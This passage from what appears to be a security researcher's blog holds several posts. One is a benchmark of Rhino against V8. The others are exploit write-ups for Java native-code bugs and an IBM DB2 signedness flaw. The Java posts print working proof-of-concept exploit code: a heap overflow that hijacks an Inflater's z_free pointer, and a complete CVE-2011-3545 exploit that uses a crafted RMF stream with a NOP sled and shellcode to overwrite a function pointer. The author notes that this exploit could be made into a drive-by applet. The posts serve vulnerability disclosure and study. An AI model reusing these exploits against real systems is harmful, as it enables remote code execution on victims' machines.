			System.err.println(String.format("%x", ((dataBitOffset + (this.height-1) * scanlineStride * 8 + (this.width-1) * numberOfBits + numberOfBits - 1)/8)));
		}
	}

Because I’m still a novice in exploitation, I’ve created the PoC exploit only for the 1.6 version of java, on 32bit linux (using libc 2.15). Exploiting the 1.6 series of java is more easy because of the lack of DEP, which is turned on in the 1.7 builds by default.

Exploitation, PoC

The PoC is based on the following mechanism. If we allocate an zlib Inflater object

Inflater i = new Inflater()

the native code allocates (besides allocating memory for other structures) a z_stream structure, which takes the following form:

typedef struct z_stream_s {
	[...]
    struct internal_state FAR *state; /* not visible by applications */
    alloc_func zalloc;  /* used to allocate the internal state */
    free_func  zfree;   /* used to free the internal state */
	[...]
} z_stream;

If we could overwrite the members (z_free) of this structure, we could easily hijack the execution flow of the application. Triggering the call to z_free, we need to issue the following on the corresponding java object:

i.end()

The exploitation “scenario” takes the following form:

  • Allocate some Inflater objects to fill the fragmented region of the heap, and drive the memory allocator to a predictable state
  • Based on the size of the z_stream struct, we calculate the widht and height of the “attacker” object in a way, so the “attacker” object will use the same fastbin as the victim objects
  • We allocate a victim object which will be right after the attacker object in the memory
  • By overflowing the attacker object we write into the victim objects memory area, changing the z_free member to point to our payload, or in our case, to set it to 0x41414141
  • Releasing the victim object, and thus hijacking the EIP register

It takes the following form:

	public static class MyBufferedImage extends BufferedImage {

		public MyBufferedImage(ColorModel colorModel, WritableRaster raster) {
			super(colorModel, raster, false, null);
		}

		@Override
		public int[] getRGB(int arg0, int arg1, int arg2, int arg3, int[] arg4, int arg5, int arg6) {
			// when this part of the code executes, the attacker object is already allocated (2nd step)

			if (arg1 == 0) {
				//first call: allocate the victim object (3rd step)
				ifx[0] = new Inflater();
			}

			if (arg1 == 10) {
				//second call: after the first call we already overflowed into the victim objects memory (4th step) 
				//now we trigger the EIP hijack (5th step)
				try { ifx[0].end(); } catch(Exception e) { }
				//exit if it was unsuccessful
				throw new RuntimeException();
			}

			// only executed at first call, we fill the array we return with values what 
 			// we can easily spot in a debugger, and calculate the necessary offset informations
			for (int i = 0; i < ret.length; i++)
				ret[i] = (0x41410000+i) ;


			// 4th step: we overwrite the necessary properties
			// ret[43] is the state member of the z_stream, we need to point it to
			// a writable area to avoid SEGFAULT, ret[45] is the z_free pointer
			ret[43] = 0xf6000000;	
			ret[45] = 0x41414141;	
			
			return ret;
		}

We need to put it all together:

public static void main(String args[]) throws Exception {
    Kernel kernel = new Kernel(1, 1, new float[] { 1.0f });
    ConvolveOp co = new ConvolveOp(kernel);
    ColorModel colorModel = new MyColorModel();
    MySampleModel sm = new MySampleModel();
    DataBuffer db = new DataBufferByte(10000000);
    WritableRaster raster = Raster.createWritableRaster(sm, db, null);
    BufferedImage src = new MyBufferedImage(colorModel, raster);
    BufferedImage dst = new MyBufferedImage(colorModel, raster);


    for(int i=0;i<ifx.length;i++)
        ifx[i]=new Inflater();

    try {
        co.filter(src, dst);
    } catch(Throwable e) {System.out.println("Error+" + e.getMessage());}
}

So we end up with this:

#
# A fatal error has been detected by the Java Runtime Environment:
#
#  SIGSEGV (0xb) at pc=0x41414141, pid=3456, tid=4137208640
#
# JRE version: 6.0_39-b04
# Java VM: Java HotSpot(TM) Server VM (20.8-b03 mixed mode linux-x86 )
# Problematic frame:
# C  0x41414141
[error occurred during error reporting (printing problematic frame), id 0xb]

# If you would like to submit a bug report, please visit:
#   http://java.sun.com/webapps/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#

---------------  T H R E A D  ---------------

Current thread (0xf6805000):  JavaThread "main" [_thread_in_native, id=3457, stack(0xf693c000,0xf698d000)]

siginfo:si_signo=SIGSEGV: si_errno=0, si_code=1 (SEGV_MAPERR), si_addr=0x41414141

Registers:
EAX=0x4141416f, EBX=0xf67f7abc, ECX=0x41414141, EDX=0xf6000000
ESP=0xf698ba0c, EBP=0xf698ba28, ESI=0xad360540, EDI=0xf6805000
EIP=0x41414141, EFLAGS=0x00010246, CR2=0x41414141

[The PoC code will be available in gitlab in a few days.]

Posted in Bugs, Security | Tagged , , , , , | 4 Comments

[revised] Benchmark: Rhino vs Chrome V8 on server side

It was a while ago, when I’ve created the post, titled ‘Benchmark: Rhino vs Chrome V8 on server side’.

Since then, it has received a lot of critics about the measurement method, so I’ve decided to rerun the measurements:

  • I’ve set all the CPU cores, to the ‘performance’ CPU governor
  • I’ve closed all the running applications (except for a browser which played Corrosion of Conformity‘s Albatross :) )
  • I’ve changed the measurement plan, to execute 50 iterations of the same measurement, just to leave enough time for the JIT compiler to do its work. The running time is measured during another 50 iterations.
  • I’ve added -Xcomp option, and I’ve checked that the JIT compiler is working properly, by adding -XX:+PrintCompilation and a “sysout-marker-string” which indicated the start of the measurement period.
  • I’ve run the tests with Oracle’s 1.6_033 32bit JDK.
  • I’ve run the tests on an Intel Core i5 – 2430M (2.4GHz).
  • I’ve shared the code at github, so you can validate the results on your machine.

Here are the results:

(Note: These tests measure CPU-burning calculations written in javascript. Usually when you use Rhino, you don’t want to run CPU-burning tasks with it, instead you use it to create some low-level interface to your application (like being able to execute custom user-scripts, for example))

                          NAME  |    V8     |   Rhino     |   hino / V8
--------------------------------|-----------|-------------|------------------
                       3d-cube  | 11.49 ms  |  251.98 ms  |  21.93 x faster
                      3d-morph  | 11.82 ms  |  344.96 ms  |  29.19 x faster
                   3d-raytrace  | 11.22 ms  |  240.51 ms  |  21.43 x faster
           access-binary-trees  |  1.06 ms  |  108.04 ms  | 101.81 x faster
               access-fannkuch  | 16.08 ms  |  634.49 ms  |  39.45 x faster
                  access-nbody  | 14.84 ms  |  317.06 ms  |  21.37 x faster
                 access-nsieve  |  4.27 ms  |  232.57 ms  |  54.53 x faster
      bitops-3bit-bits-in-byte  |  5.02 ms  |  209.90 ms  |  41.81 x faster
           bitops-bits-in-byte  |  8.39 ms  |  346.20 ms  |  41.27 x faster
            bitops-bitwise-and  |  8.02 ms  |  736.00 ms  |  91.77 x faster
            bitops-nsieve-bits  | 11.02 ms  |  383.45 ms  |  34.79 x faster
         controlflow-recursive  |  2.04 ms  |  145.61 ms  |  71.35 x faster
                    crypto-aes  |  6.14 ms  |  193.49 ms  |  31.50 x faster
                    crypto-md5  |  5.22 ms  |  194.12 ms  |  37.16 x faster
                   crypto-sha1  |  6.02 ms  |  201.37 ms  |  33.45 x faster
             date-format-tofte  |  8.10 ms  |  186.33 ms  |  23.00 x faster
             date-format-xparb  |  9.24 ms  |  139.06 ms  |  15.04 x faster
                   math-cordic  | 10.39 ms  |  408.51 ms  |  39.33 x faster
             math-partial-sums  | 15.78 ms  |  303.04 ms  |  19.21 x faster
            math-spectral-norm  |  5.12 ms  |  169.76 ms  |  33.14 x faster
                    regexp-dna  |  9.12 ms  | 1268.24 ms  | 139.02 x faster
                 string-base64  |  4.00 ms  |  403.27 ms  | 100.82 x faster
                  string-fasta  |  8.33 ms  |  396.35 ms  |  47.60 x faster
               string-tagcloud  | 11.51 ms  | 1109.16 ms  |  96.36 x faster
            string-unpack-code  | 20.22 ms  | 1454.22 ms  |  71.90 x faster
         string-validate-input  |  4.39 ms  | 2311.41 ms  | 526.79 x faster

Nothing surprising: The numbers have changed, but V8 is still the better one.

I’m open to criticism, so if you think, my measurements are wrong, please show me how you measure or compare the performance of the two libraries.

(Tip, if you want to play with it: I’ve done the measurements using Oracle’s JDK 1.7.0_05 too, and with that version, Rhino runs 4-5 times slower. That could be a more interesting problem, but I want to double check the measurements, before I publish the details.)

Posted in Benchmark | Tagged , , , , | 1 Comment

Analysis of CVE-2012-0711 (IBM DB2 Integer Signedness Error)

It this post I’m going to analyse the details of CVE-2012-0711 (IBM’s security bulettin), an integer signedness bug, I’ve found in IBM DB2 Express-C a while ago.

The description of the bug:

“Integer signedness error in the db2dasrrm process in the DB2 Administration Server (DAS) in IBM DB2 9.1 through FP11, 9.5 before FP9, and 9.7 through FP5 on UNIX platforms allows remote attackers to execute arbitrary code via a crafted request that triggers a heap-based buffer overflow.”

I’m always curious how a vulnerability was found, and this details are almost never public. After I’ve analysed ZDI-11-036, I’ve learned the format of DB2 DAS communication protocol. I’ve created a simple (byte-replacer) protocol-aware fuzzer which only modified the “data” blocks during the communication, and wrote a simple client sending SysCmd requests to the database. After having a lot of crashes, it turned out, that the replaced bytes were always in the encrypted username. (You can see the dump of a communication here.) I wanted to create a client which gives me more fine-grained control above the communication (my client used db2dasutil.so through JNI, so I had only a toplevel interface). After trying to understand and implement the Diffie-Hellman key exchange for two weeks (as it turned out later, it’s not needed to control the Diffie-Hellman part), I give up this idea, and started to check the details of the crash.

Lets start with the backtrace:

(gdb) ba
#0  0xb7336102 in DasHashTable::get(DasHashKey*) () from /opt/ibm/db2/V9.7/lib32/libdb2dascmn.so.1
#1  0x08057398 in validateUser(rrmRequestContext*) ()
#2  0x08056fd0 in authenticateRequest ()
#3  0x0805632c in handleServerEncryptAuthRequest(rrmRequestContext*, dasRecvParam*) ()
#4  0x08054c48 in handleRequest ()
#5  0xb73a74f6 in db2dasThreadMain () from /opt/ibm/db2/V9.7/lib32/libdb2dasapi.so.1
#6  0xb6c76e99 in start_thread (arg=0x661e2b70) at pthread_create.c:304
#7  0xb6aae73e in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:130

Lets have a look at DasHashTable::get(DasHashKey*) with some comments:

   0x005cd0db <+77>:	mov    0xc(%ebp),%eax
   0x005cd0de <+80>:	push   %eax
   0x005cd0df <+81>:	mov    (%eax),%edx
   0x005cd0e1 <+83>:	call   *(%edx)
   # this is a call of UidKey::getHashCode [_ZN6UidKey11getHashCodeEv], throught vtable

   0x005cd0e3 <+85>:	add    $0x4,%esp
   # eax contains the calculated hash code of the username

   0x005cd0e6 <+88>:	mov    0x8(%ebx),%ecx		#0x64
   0x005cd0e9 <+91>:	mov    (%ebx),%ebx		
   0x005cd0eb <+93>:	cltd
   0x005cd0ec <+94>:	idiv   %ecx
   # after this division edx will contain the remainder in the range -0x63..0x63

   0x005cd0ee <+96>:	mov    (%ebx,%edx,4),%ebx
   # ebx <- *(ebx + 4 * (-0x63 .. 0x63 ))

We can see, that this part of the function takes a string from the DasHashKey structure, calculates it’s hash, and after a modulo 0x64 operation it uses the value, to index an array. The string is the supplied username, and most probably this is a hashtable implementation, with fixed (0x64) size. The problem is, that if the remainder is a negative number, we underrun the buffer.

Lets look into the implementation of UidKey::getHashCode:

0x08063b78 <+12>:	mov    0x8(%ebp),%ebx	#0:[ptr] 4:[username]
0x08063b7b <+15>:	lea    0x4(%ebx),%ecx	#ecx <- pointer to the username string
#this block calculates the length of the username
0x08063b7e <+18>:	xor    %eax,%eax
0x08063b80 <+20>:	movzbl (%ecx,%eax,1),%edx
0x08063b84 <+24>:	test   %edx,%edx
0x08063b86 <+26>:	je     0x8063b97 <_ZN6UidKey11getHashCodeEv+43>
0x08063b88 <+28>:	movzbl 0x1(%ecx,%eax,1),%edx
0x08063b8d <+33>:	add    $0x2,%eax
0x08063b90 <+36>:	test   %edx,%edx
0x08063b92 <+38>:	jne    0x8063b80 <_ZN6UidKey11getHashCodeEv+20>
0x08063b94 <+40>:	add    $0xffffffff,%eax
0x08063b97 <+43>:	mov    %eax,%esi	# esi <- strlen(username)
[...]
#after this block, eax will contain the sum of the character codes in the username string
0x08063bba <+78>:	test   %esi,%esi
0x08063bbc <+80>:	jle    0x8063bf7 <_ZN6UidKey11getHashCodeEv+139>
0x08063bbe <+82>:	mov    %edi,-0xc(%ebp)
0x08063bc1 <+85>:	xor    %eax,%eax
0x08063bc3 <+87>:	xor    %edx,%edx
0x08063bc5 <+89>:	movsbl 0x4(%edx,%ebx,1),%edi
0x08063bca <+94>:	add    %edi,%eax
0x08063bcc <+96>:	add    $0x1,%edx
0x08063bcf <+99>:	cmp    %esi,%edx
0x08063bd1 <+101>:	jl     0x8063bc5 <_ZN6UidKey11getHashCodeEv+89>
0x08063bd3 <+103>:	mov    -0xc(%ebp),%edi			

Looking into the code, we can easily see, that it first calculates the length of the specified username, then fetches it character by character and calculates the hashcode, as the sum of the charactercodes. Its interesting, that it handles the characters as unsigned (movzbl) when calculating the length, but signed (mobsbl) when calculating the sum. Later turned out, that the problem affects only Linux versions of DB2, because the Windows versions use unsigned chars when calculating the hash.

Lets get back to our “hijacked” pointer:

#if ebx is NULL we exit
0x005cd0f1 <+99>:	test   %ebx,%ebx
0x005cd0f3 <+101>:	je     0x5cd123 <_ZN12DasHashTable3getEP10DasHashKey+149>

#if *ebx is not mapped memory, a SEGFAULT happens
0x005cd0f5 <+103>:	mov    0xc(%ebp),%edi
0x005cd0f8 <+106>:	mov    (%ebx),%eax	
		
#if *ebx is NULL, we exit						
0x005cd0fa <+108>:	test   %eax,%eax
0x005cd0fc <+110>:	je     0x5cd11c <_ZN12DasHashTable3getEP10DasHashKey+142>

#if  *(*(ebx)) points to nonmapped memory, we SEGFAULT
0x005cd0fe <+112>:	push   %edi
0x005cd0ff <+113>:	push   %eax
0x005cd100 <+114>:	mov    (%eax),%edx	

#we call *(*(*(ebx))+4)
0x005cd102 <+116>:	call   *0x4(%edx)

We can move the ebx pointer backward up to 100 words. ebx is originally pointing to an object so with this we can make the pointer to point into a different object’s memory area. If we can control a word in this area, we can build up a dereference chain, which will enable us to call an arbitrary function. I didn’t checked that controlling of one word in this area is possible or not, but I found this video, and I suppose its about the same vulnerability.

The simplest example of triggering the bug is to specify a one character username, because with one character usernames from range (128..255) we can generate all the possibilities of ebx overwrites (-0x63 .. -1).

For the test case I’ve created a simple example. The code uses the DasSysCmd command, but it is irrelevant, because the crash happens in the authentication stage, before sending the command. Every other command would be appropriate, which requires authentication. You can reach it here.

Posted in Bugs, Security | Tagged , , , , , | Leave a comment

Analysis of CVE-2011-3545 (ZDI-11-307)

I’ve decided to share the details of the first 0-day I’ve found. There are a lot of Java vulnerabilities nowadays, mainly originating from bytecode verifier bugs or desing flaws in the JDK, which can be exploited usign pure java code (for example check Michael Schierl’s posts in this area: 1,2).

This vulnerability is a bit different: it is caused by a bug in native code.

I’ve done my research using Sun’s Java 1.6.24 (the latest version at that time) on a fully patched Windows XP SP3. Originaly I’ve tried to reproduce the vulnerability found by Peter Vreugdenhil, when I accidentally stumbled upon this bug. The vulnerability is a pseudo-arbitrary write in the native code. Main cause is an integer signedness problem, but we can treat it also as an integer wrapping error. “Pseudo” here means, that we can only overwrite negative values relative to our vulnerable target object.

The problematic native code:

j2se/src/share/native/com/sun/media/sound/engine/GenSeq.c:

void GM_SetControllerCallback(GM_Song *theSong, void * reference, GM_ControlerCallbackPtr controllerCallback, short int controller)
{
    GM_ControlCallbackPtr	pControlerCallBack;

    if ( (theSong) && (controller < MAX_CONTROLLERS) )
    {
        pControlerCallBack = theSong->controllerCallback;
        if (pControlerCallBack == NULL)
        {
            pControlerCallBack = 
                (GM_ControlCallbackPtr)XNewPtr((INT32)sizeof(GM_ControlCallback));
            theSong->controllerCallback = pControlerCallBack;
        }
        if (pControlerCallBack)
        {
            pControlerCallBack->callbackProc[controller] = controllerCallback;				
[*]         pControlerCallBack->callbackReference[controller] = (void *)reference;			
        }
    }
}

As we can see, if we give a negative number as a parameter for the function GM_SetControllerCallback, we can write in [*] to an arbitrary memory address in the range of pControlerCallBack->callbackReference+ 4*(-32768 .. 0). The written value is
“(void *)pSong->userReference”, which is the ID of the RMFBlock, what we can control (as we will see).

The first step was to find the java entry point to reach this native function:

j2se/src/share/native/com/sun/media/sound/MixerSequencer.c:

JNIEXPORT void JNICALL
Java_com_sun_media_sound_MixerSequencer_nAddControllerEventCallback(JNIEnv* e, jobject thisObj,jlong id, jint controller)
{
    GM_Song *pSong = (GM_Song *) (INT_PTR) id;
    GM_SetControllerCallback(pSong, (void *)pSong->userReference, 
        *(PV_ControllerEventCallback), (short int)controller);
}

To trigger this code, we use the following function in the POC:

1, we prepare the relative addresses, we want to overwrite in the controllers array:

public int[] addControllerEventListener(ControllerEventListener listener, int[] controllers) {
    synchronized( controllerEventListeners ) {
        [...]
        if( !flag ) {
            cve = new ControllerVectorElement( listener, controllers );
            controllerEventListeners.addElement( cve );
        }
        [...]
    }
}

The value is calculated by the following equation:

0xffffffff-(<ADDRESS OF pControlerCallBack->callbackReference>-<ADDRESS we want to write>)/4+1

2, the overwrite is happening in setSequence, where the vulnerable native function (nAddControllerEventCallback) is called:

public synchronized void setSequence(InputStream stream) throws IOException, InvalidMidiDataException {
    [...]
    for (i = 0; i < controllerEventListeners.size(); i++) {
        ControllerVectorElement cve = (ControllerVectorElement)controllerEventListeners.elementAt(i);
        for (int z = 0; z < cve.controllers.length; z++) {
            nAddControllerEventCallback(id, cve.controllers[z]);
        }
    }
}

In the POC exploit code (i try to overwrite pSong->GM_SongMetaCallbackProcPtr function pointer, with the address of our shellcode. This callback will be called as we start the sequencer.

Because the relative address of pSong and pControllerCallBack->callbackReference varies, the exploit is not always successful. I’ve chosen one value, which I measured by running the code from a debugger. It is possible to use more than one frequent relative address. Currently the exploit (using one address) is successful at 10% of the times, but in the other cases, it don’t crashes so we can rerun it. I’m sure a more reliable exploit can be created, but I’m a first-timer in this area. If you know how to do it more reliably please share with me.

Although I’ve created the poc running from command line, because there is no SecurityManager involved, so you can easily create an applet from the POC exploit code. That means, it allows remote attackers to execute arbitrary code on vulnerable installations of the Java Runtime Environment. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

Here I have a proof of concept video.

And this is the POC exploit (To understand more deeply, how the RMF sequence is processed, you should read Peter Vreugdenhil’s blogpost, which goes into more details):

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;

import javax.sound.midi.MidiDevice;
import javax.sound.midi.MidiSystem;
import javax.sound.midi.MidiUnavailableException;
import javax.sound.midi.Sequencer;

 
public class Exploit  {
    // A class representing an RMF Block item  
    public static class RMFBlock {
        String type;
        public String getType() {
            return type;
        }

        public int getId() {
            return id;
        }

        public byte[] getData() {
            return data;
        }

        int id;
        byte[] data;
        
        public RMFBlock(String type, int id, byte[] data) {
            super();
            this.type = type;
            this.id = id;
            this.data = data;
        }
        
        public int length() {
            return 4+4+4+1+4+data.length;
        }
    };
    
    // Helper class to build RMF streams 
    public static class RMF {
        List<RMFBlock> blocks = new ArrayList<RMFBlock>();
        public void addBlock(String type, int id, byte[] data) {
            blocks.add(new RMFBlock(type, id, data));
        }
        
        public byte[] toByteArray() {
            int length = 12;
            for(RMFBlock block : blocks)
                length+=block.length();

            byte[] ret = new byte[length];
            int pos;
            pos = writeStr(ret, 0, "IREZ");
            pos = writeInt(ret, pos, 1);
            pos = writeInt(ret, pos, blocks.size());

            for(RMFBlock block : blocks) {
                pos = writeInt(ret, pos, pos+block.getData().length+4+4+4+1+4+1);
                pos = writeStr(ret, pos, "SONG");
                pos = writeInt(ret, pos, block.getId());
                ret[pos++] = 0;
                pos = writeInt(ret, pos, block.getData().length);
                pos = writeBA(ret, pos, block.getData());
                
            }
            return ret;
        }

        private int writeBA(byte[] ret, int i, byte[] data) {
            int j;
            for(j=0; j<data.length; j++)
                ret[i+j] = data[j];
            return i+j;
        }

        private int writeInt(byte[] ret, int i, int size) {
            ret[i  ] = (byte)((size >> 24) & 0xff);
            ret[i+1] = (byte)((size >> 16) & 0xff);
            ret[i+2] = (byte)((size >>  8) & 0xff);
            ret[i+3] = (byte)((size      ) & 0xff);
            return i+4;
        }

        private int writeStr(byte[] ret, int i, String str) {
            int j;
            for(j=0; j< str.length(); j++) {
                ret[i+j] = (byte) str.charAt(j);
            }
            return i+j;
        }
    };
    
    //relative addresses we want to overwrite, I'm only using one address, but reliability
    //can be improved using more than one address, based on measurements.
    static int[] relAddr = new int[] {0xFFFFCF22};
    
    
    public static void main(String[] args) throws IOException {
        //this will be our shellcode (nop sled + calc exec code)
        byte[] pl = generatePayload();
        
        //lets create an RMF stream with a SONG block. this is necessary.
        //the ID of the block (0x00187C00) is the address what we use, to 
        //overwrite a function pointers value. It will point to our shellcode.
        RMF rmf = new RMF();
        rmf.addBlock("SONG", 0x00187C00, new byte[] { 
                0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
                0,0,0,0,0,0,0
        });
        //add a new block, with the shellcode. BTW: Cica is 'Cat' in hungarian.
        rmf.addBlock("CICA", 0, pl);

        Sequencer sequencer = null;

        try {
            // Retrieves the vulnerable midi sequencer object.
            // In order to get the right sequencer (MixerSequencer), we must define
            // META-INF/services/javax.sound.midi.spi.MidiDeviceProvider
            // with "com.sun.media.sound.MixerSequencerProvider" as content
            sequencer = retrieveSequencer();
            sequencer.open();

            // Doing the "arbitrary" write here. 
            sequencer.addControllerEventListener(null, relAddr);
            
            // Loading our SONG, and of course the shellcode.
            sequencer.setSequence(new ByteArrayInputStream(rmf.toByteArray()));
            
            // Triggering the exploit
            sequencer.start();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        
    }
    
    // Utility function: converts a byte to a byte array
    private static byte[] readFile(String filename) throws IOException {
        // Try first from the JAR
        InputStream fstream = Exploit.class.getResourceAsStream(filename);
        // Fall back to filesystem
        if(fstream == null)
            fstream = new FileInputStream(filename);
        
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        byte[] buf = new byte[1024];
        int c;
        while((c = fstream.read(buf)) != -1) {
            bos.write(buf, 0, c);
        }
        return bos.toByteArray();
    }

    // Generating the payload, using 
    // http://code.google.com/p/w32-exec-calc-shellcode/
    // for shellcode
    private static byte[] generatePayload() throws IOException {
        
        byte[] shellcode = readFile("w32-exec-calc-shellcode.bin");
         
        byte[] pl = new byte[2048];
        for(int i=0; i < pl.length; i++)
            pl[i] = (byte)0x90;
        
        for(int j=0; j<shellcode.length; j++) {
            pl[pl.length-shellcode.length+j] = shellcode[j]; 
        }
        
        return pl;
    }

    // Retrieving the vulnerable sequencer
    private static Sequencer retrieveSequencer() throws MidiUnavailableException {
        MidiDevice.Info[] infos = MidiSystem.getMidiDeviceInfo();
        MidiDevice mixer = MidiSystem.getMidiDevice(infos[0]);
        return (Sequencer)mixer;
    }
}

And this is the first crash everybody wants to see, when exploiting native bugs:


#
# A fatal error has been detected by the Java Runtime Environment:
#
#  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x41414141, pid=2804, tid=2852
#
# JRE version: 6.0_24-b07
# Java VM: Java HotSpot(TM) Client VM (19.1-b02 mixed mode, sharing windows-x86 )
# Problematic frame:
# C  0x41414141
#
# If you would like to submit a bug report, please visit:
#   http://java.sun.com/webapps/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#

---------------  T H R E A D  ---------------

Current thread (0x02cefc00):  JavaThread "Headspace mixer frame proc thread" daemon [_thread_in_native, id=2852, stack(0x03560000,0x035b0000)]

siginfo: ExceptionCode=0xc0000005, reading address 0x41414141

Registers:
EAX=0x41414141, EBX=0x00187b11, ECX=0x00187b12, EDX=0x00000007
ESP=0x035af7b0, EBP=0x035af7f8, ESI=0x00000007, EDI=0x00187c10
EIP=0x41414141, EFLAGS=0x00010206
Posted in Bugs, Security | Tagged , , , , | 7 Comments